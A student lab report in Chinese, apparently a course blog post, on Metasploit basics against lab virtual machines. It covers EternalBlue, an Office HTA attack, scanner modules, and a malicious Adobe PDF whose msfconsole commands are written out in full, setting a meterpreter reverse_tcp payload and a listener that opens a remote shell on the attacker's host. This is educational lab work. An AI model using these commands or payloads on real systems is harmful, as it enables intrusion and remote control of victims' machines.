2018-2019 20165235 网络对抗 Exp5 MSF基础

1. 实践内容(3.5分)

1.1一个主动攻击实践

攻击方:kali 192.168.21.130
靶机: win7 192.168.21.128
永恒之蓝漏洞是利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
进入msfconsole输入 use exploit/windows/smb/ms17_010_eternalblue。并且通过show payloads 显示可用攻击载荷。

设置tcp反向连接:

设置参数:

输入:exploit

渗透成功:

1.2 一个针对浏览器的攻击

攻击方:kali 192.168.21.130
靶机: win7 192.168.21.128
我们先启动msfconsole并使用模块use exploit/windows/fileformat/office_word_hta

查看目标show targets

show options,可以看到已经默认帮我们配置好了,我们只需要run执行即可,相应的产生了一个URL。

在靶机的IE浏览器中输入KALI中生成的URL,出现一个窗口,点击运行即可:

看到kali那里已经产生了session会话,我们按下回车回到命令行,使用sessions -i 1来与第一个session建立连接,再输入shell拿到权限:

输入指令测试,渗透陈成功:

1.3 一个针对客户端的攻击(Adobe)

本次实验在win7中实验并没有成功,于是我将靶机换成XP系统。
查看靶机ip:

kali输入msfconsole进入控制台,依次输入以下命令
攻击方:kali 192.168.21.130
靶机: win7 192.168.21.131
use windows/fileformat/adobe_cooltype_sing :选择攻击模块
set payload windows/meterpreter/reverse_tcp :设置tcp反向连接
set LHOST 192.168.21.130 :kali IP
set LPORT 5235 :设置攻击端口
set FILENAME 20165235.pdf :设置生成的pdf文件名
exploit:发起攻击

我是第二次做的时候截的屏,所以没有显示文件路径。将20165235.pdf复制到XP中。重启控制台,并且输入以下命令进入监听模块:
use exploit/multi/handler:进入监听模块
set payload windows/meterpreter/reverse_tcp :设置tcp反向连接
set LHOST 10.0.0.138 :kali IP
set LPORT 5330:设置攻击端口
exploit :监听

接着在XP中打开20165235.pdf文件:

渗透成功:

关闭20165235.pdf,连接断开:

1.4 成功应用任何一个辅助模块。

auxiliary/scanner/ftp/ftp_version

攻击方:kali 192.168.21.130
靶机: win7 192.169.21.128
本次的模块是通过MSF渗透帮助手册中找到的。功能是可以查询到某一网段中的ftp服务器以及其操作系统的类型。
首先在win7中搭建一个ftp服务器,具体的过程可以上网查找。一下是搭建好的ftp服务器:

测试ftp服务器是否可用:

进入msfconsole,输入use auxiliary/scanner/ftp/ftp_version,设置要扫描的网段范围:set RHOSTS 192.168.21.1-254,设置线程数:set THREADS 55,(线程数是每次扫描的主机个数。),直接输入run即可看到结果:192.168.21.128:被扫描出来,并分析出是微软的Windows操作系统。

auxiliary/scanner/portscan/tcp

攻击方:kali 192.168.21.130
靶机: win7 192.168.21.128
创建msf所需的数据库:
service postgresql start
msfdb start
进入msfconsole,使用auxiliary/scanner/portscan/tcp模块,用来扫描靶机的TCP端口使用情况。执行命令use auxiliary/scanner/portscan/tcp进入并使用模块:输入show options查看需要设置的参数信息:

设置参数:set RHOSTS 192.168.21.128set PROTS 1 - 5235(扫描1到5235端口),之后使用run,进行扫描。

2 报告内容:

2.1.基础问题回答

(1)用自己的话解释什么是exploit,payload,encode.

  • exploit:exploit字面上的意思是“开拓、开发”,exploit就是利用一切可以利用的工具、采用一切可以采用的方法、找到一切可以找到的漏洞,并且通过对漏洞资料的分析研究,从而达到获取网站用户资料文档、添加自定义用户、甚至侵入网站获得管理员权限控制整个网站的最终目的。但是在MSF中,exploit将负责攻击的代码payload传送到靶机中。
  • payload:payload是指:有效载荷。它是靶机被渗透攻击之后执行的恶意代码。
  • encode:是编码的意思。将payload进行多次编码后,使改变其形态。

    2.2.实践总结与体会

    通过本次的实践,学会了利用MSF进行多种方式的渗透,不敢说能灵活应用并且实战,但是学到了不少东西。在进行实验时,网上的资料太少,而且对好多模块并不知道它的意思以及用法,于是我就翻出它的英文帮助手册,利用翻译软件看懂了使用方法。在以后的学习过程中一定要活学活用。

    2.3.离实战还缺些什么技术或步骤

    首先是攻击手法单一,应用不灵活,在实战中要求使用多种方法,学会去扫描靶机的漏洞以及可用的端口等。要真正的应用于实战就要我们能灵活的使用MSF提供的大部分的攻击手段,同时也得学会使用其他的攻击平台。

2018-2019 20165235 网络对抗 Exp5 MSF基础的更多相关文章

  1. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  2. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

  3. 2018-2019 20165220 网络对抗 Exp5 MSF基础

    实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何 ...

  4. 2018-2019 20165219 网络对抗 Exp5 MSF基础

    实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms ...

  5. 20145338 《网络对抗》 MSF基础应用

    20145338<网络对抗> MSF基础应用 实验内容 ·掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路. 具体需要完成(1)一个主动攻击;(2)一个针对浏览器的攻击 ...

  6. 20145308 《网络对抗》 MSF基础应用 学习总结

    20145308 <网络对抗> MSF基础应用 学习总结 实验内容 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...

  7. 20145326蔡馨熤《网络对抗》——MSF基础应用

    20145326蔡馨熤<网络对抗>——MSF基础应用 实验后回答问题 用自己的话解释什么是exploit,payload,encode. exploit:起运输的作用,将数据传输到对方主机 ...

  8. 20155218《网络对抗》MSF基础应用

    20155218<网络对抗>MSF基础应用 实验过程 1.一个主动攻击实践,如ms08_067; 首先使用 search ms08_067查询一下该漏洞: show target 查看可以 ...

  9. 20155304《网络对抗》MSF基础应用

    20155304<网络对抗>MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_ ...

随机推荐

  1. Redis 高级部分

    一.主从复制   image.png Rdis 的主从复制特点   image.png 1. 配置主从 实现方式同样有两种: 命令方式和配置文件方式 命令方式 只需要在从服务器上执行如下命令即可 sl ...

  2. Kettle日志中BootFeaturesInstaller错误

    到新公司接手了别人的Kettle ETL作业. 发现每次启动 Kettle ,日志中都会出现下面的错误,虽然不影响运行结果,但是看着不爽: 18:41:15,327 INFO [KarafInstan ...

  3. 为vue添加公用方法,vue添加通用方法

    common.js var common =function() { return{ f1:function(){ console.log("this is common f1().&quo ...

  4. python--再看并行之协程线程进程

    1.gevent协程适合I/O密集,不适合CPU密集. 3.gevent协程无法发挥多核优势,事实上,协程只是以单线程的方式在运行. 3.子程序就是协程的一种特例 项目实际应用 from gevent ...

  5. mysql的order by注入

    最近在做一些漏洞盒子后台项目的总结,在盒子众多众测项目中,注入类的漏洞占比一直较大.其中Order By注入型的漏洞也占挺大一部分比例,这类漏洞也是白帽子乐意提交的类型(奖金高.被过滤概览小).今天给 ...

  6. 多个div实现随意拖拽功能

    鼠标事件 mousedownmousemovemouseup注意事项:被拖动的div的position属性值一定是absolute.切记不可使用margin-top:10px;而应该使用top:10p ...

  7. 风火轮SMC532使用

    2018年3月份申请了一个院创,要做一个基于NFC技术的考勤设备,想法是用手机的NFC将学号信息传导考勤机,由考勤机统计缺勤信息,因为自己的拖延症,一直拖到现在.现在一边写毕业论文一边准备院创答辩,又 ...

  8. python3.4 + pycharm 环境安装 + pycharm使用

    因个人是windows的环境,所以本文只讲windows环境下的python安装. 作为初用python的盆友,强烈建议只在电脑上装一个python版本就好了,不然就进了各种坑里了. 第一步:下载和安 ...

  9. WPF UserControl响应窗体的PreviewKeyDown事件

    目的 在UserControl页面实现通过快捷键打开新建窗口 实现过程 监听Window窗体的PreviewKeyDown 其实,使用KeyDown事件也是可以的 页面代码 <Window x: ...

  10. 《ASCE1885的信息安全》のCryptoAPI---密钥的产生和交换函数

    在公开密码算法的前提下,数据的安全取决于密钥.因此,密钥的产生.销毁.交换(分发)是数据保密工作中的重要部分. CryptoAPI密钥产生和交换函数主要有生成密钥函数CryptGenKey.派生密钥函 ...